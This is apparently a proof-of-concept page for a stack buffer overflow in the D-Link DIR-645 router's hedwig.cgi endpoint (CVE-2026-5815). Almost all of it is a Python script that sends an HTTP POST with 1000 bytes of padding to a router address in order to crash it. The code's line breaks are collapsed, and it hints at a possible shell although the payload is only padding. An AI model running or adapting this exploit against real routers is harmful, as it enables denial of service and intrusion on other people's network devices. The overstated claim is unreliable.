CVE-2026-5815 D-Link DIR-645栈溢出漏洞

import socket import sys # Target configuration TARGET_IP = "192.168.0.1" TARGET_PORT = 80 # Payload generation to trigger stack-based buffer overflow # Padding to overflow the buffer and overwrite the return address padding = "A" * 1000 # HTTP Request structure targeting the vulnerable endpoint header = "POST /cgi-bin/hedwig.cgi HTTP/1.1\r\n" header += "Host: {}\r\n".format(TARGET_IP) header += "Content-Type: application/x-www-form-urlencoded\r\n" header += "Content-Length: {}\r\n\r\n".format(len(padding)) payload = header + padding try: print("[+] Sending exploit payload to {}...".format(TARGET_IP)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET_IP, TARGET_PORT)) s.send(payload.encode()) response = s.recv(1024) print("[+] Payload sent. Check target for crash or shell.") s.close() except Exception as e: print("[-] Error: {}".format(e))